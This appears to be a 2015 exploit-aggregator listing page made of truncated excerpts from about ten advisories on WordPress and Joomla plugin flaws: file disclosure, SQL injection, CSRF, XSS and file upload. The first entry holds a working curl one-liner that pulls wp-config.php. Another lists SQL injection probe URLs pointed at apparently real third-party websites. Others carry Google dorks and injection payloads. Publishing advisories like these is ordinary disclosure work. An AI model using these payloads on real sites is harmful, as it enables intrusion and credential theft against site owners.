WordPress Fusion Engage Local File Disclosure

16 April 2015 - Source: http://www.mondounix.com
Fusion Engage is a commercial WordPress plugin sold by internet marketer (and known scammer) Precious Ngwu to.. I'm actually not sure. Something to do with video embedding.
 
Anyway, it has an LFD. Here's the relevant code..
 
function fe_get_sv_html(){
        global $wpdb, $video_db, $ann_db;
 
        print(file_get_contents($_POST['video']));
 
        wp_die();
    }
add_action('wp_ajax_nopriv_fe_get_sv_html', 'fe_get_sv_html');
add_action('wp_ajax_fe_get_sv_html', 'fe_get_sv_html');
 
So, you can exploit it easily... quick curl one-liner to get wp-config.php:
curl --data "action=fe_get_sv_html&video=../wp-config.php" "http://exploitable-site/wp-admin/admin-ajax.php"
 
Precious...


WordPress Duplicator 0.5.14 Cross Site Request Forgery / SQL Injection

16 April 2015 - Source: http://www.mondounix.com
######################
 
# Exploit Title : Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://lifeinthegrid.com/labs/duplicator/
 
# Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip
 
# Date : 2015-04-08
 
# Tested on : Linux / Mozilla Firefox         
 
######################
 
# Description
 
 Wordpress Duplicator 0.5.14 suffers from a remote SQL injection vulnerability
 
 
 Location file: /view/actions.php
 
 This is the bugged ajax function wp_ajax_duplicator_package_delete:
 
 function duplicator_package_delete() {
 
  DUP_Util::CheckPermissions('export');
 
...


WordPress Windows Desktop And iPhone Photo Uploader File Upload

16 April 2015 - Source: http://www.mondounix.com
##################################################################################################
#Exploit Title : Wordpress plugin Windows Desktop and iPhone Photo Uploader arbitrary file upload vulnerability
#Author        : Manish Kishan Tanwar AKA error1046
#Home Page     : https://wordpress.org/plugins/i-dump-iphone-to-wordpress-photo-uploader/
#Download Link : https://downloads.wordpress.org/plugin/i-dump-iphone-to-wordpress-photo-uploader.1.8.zip
#Date          : 9/04/2015
#Love to       : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi
#Discovered At : Indishell Lab
##################################################################################################
 
////////////////////////
///...


WordPress Shareaholic 7.6.0.3 Cross Site Scripting

8 April 2015 - Source: http://www.mondounix.com
# Exploit Title: Shareaholic 7.6.0.3 XSS
# Date: 10-11-2014
# Software Link: https://wordpress.org/plugins/shareaholic/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9311
# Category: webapps
 
1. Description
 
ShareaholicAdmin::add_location is accessible for every registered user.
 
File: shareaholic\shareaholic.php
 
add_action('wp_ajax_shareaholic_add_location',  array('ShareaholicAdmin', 'add_location'));
 
 
$_POST['location'] is not escaped.
 
File: shareaholic\admin.php
 
public static function add_location() {
  $location = $_POST['location'];
  $app_name = $location['app_name'];
  ShareaholicUtilities::update_options(array(
...


Joomla Contact Form Maker 1.0.1 SQL Injection

3 April 2015 - Source: http://www.mondounix.com
[+]Title: Joomla Contact Form Maker v1.0.1 Component - SQL injection vulnerability
[+]Author: TUNISIAN CYBER
[+]Date: 29/03/2015
[+]Vendor: http://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/contact-form-maker
[+]Type:WebApp
[+]Risk:High
[+]Overview:
Contact Form Maker v1.0.1 suffers from an SQL injection vulnerability.
 
[+]Proof Of Concept:
 
127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL
 
 
https://hmg-e-publishing.com/index.php?option=com_contactformmaker&view=contactformmaker&id=-1%27
http://ariane.com/index.php?option=com_contactformmaker&view=contactformmaker&id=-1'


...


Joomla Gallery WD SQL Injection

3 April 2015 - Source: http://www.mondounix.com
######################################################################
# Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability
# Google Dork: inurl:option=com_gallery_wd
# Date: 29.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://web-dorado.com/
# Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd
# Tested on: Windows
######################################################################
 
parameter 'theme_id' in GET vulnerable
 
# Example :
# Parameter: theme_id (GET)
# Type: error-based
# GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT...


WordPress Revolution Slider File Upload

3 April 2015 - Source: http://www.mondounix.com
######################################################################
# Exploit Title: Wordpress Plugin Revolution Slider - Unrestricted File Upload
# Google Dork: Y0ur Brain
# Date: 27.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://revolution.themepunch.com/
# Version: old
# Tested on: Windows
######################################################################
 
 
# Path of File : /wp-content/plugins/revslider/revslider_admin.php
# Vulnerable File : revslider_admin.php
 
    $action = self::getPostGetVar("client_action");
    $data = self::getPostGetVar("data");
...
    case "get_captions_css":
     $contentCSS = $operations->getCaptionsContent();
...


WordPress Simple Ads Manager SQL Injection

3 April 2015 - Source: http://www.mondounix.com
#Vulnerability title: Wordpress plugin Simple Ads Manager - SQL Injection
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2824
#Author: Le Hong Minh (minh.h.le () itas vn) & ITAS Team
 
 
::PROOF OF CONCEPT::
 
---SQL INJECTION 1---
 
+ REQUEST:
 
POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/28.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;...


WordPress videowhisper-video-conference-integration v4.91.8 Remote file upload

3 April 2015 - Source: http://www.mondounix.com
Title: Remote file upload vulnerability in videowhisper-video-conference-integration wordpress plugin v4.91.8
Author: Larry W. Cashdollar, @_larry0
Date: 2015-03-29
Download Site: https://wordpress.org/support/plugin/videowhisper-video-conference-integration
Vendor: http://www.videowhisper.com/
Vendor Notified: 2015-03-31, won’t fix. http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822
Vendor Contact: http://www.videowhisper.com/tickets_submit.php
Advisory: http://www.vapid.dhs.org/advisory.php?v=116
Description: From their site "VideoWhisper Video Conference is a modern web based multiple way video chat and real time file sharing tool.  Read more on WordPress Video Conference plugin home page."
 
Vulnerability:
./videowhisper-video-conference-integration/vc/vw_upload.php...


WordPress videowhisper-video-presentation v3.31.17 Remote file upload

3 April 2015 - Source: http://www.mondounix.com
Title: Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation v3.31.17
Author: Larry W. Cashdollar, @_larry0
Date: 2015-03-29
Download Site: https://wordpress.org/plugins/videowhisper-video-presentation/
Vendor: http://www.videowhisper.com/
Vendor Notified: 2015-03-31 won’t fix, http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822
Vendor Contact: http://www.videowhisper.com/tickets_submit.php
Advisory: http://www.vapid.dhs.org/advisory.php?v=117
Description: from the site "VideoWhisper Video Consultation is a web based video communication solution designed for online video consultations, interactive live presentations, trainings, webinars, coaching and online collaboration with webcam...
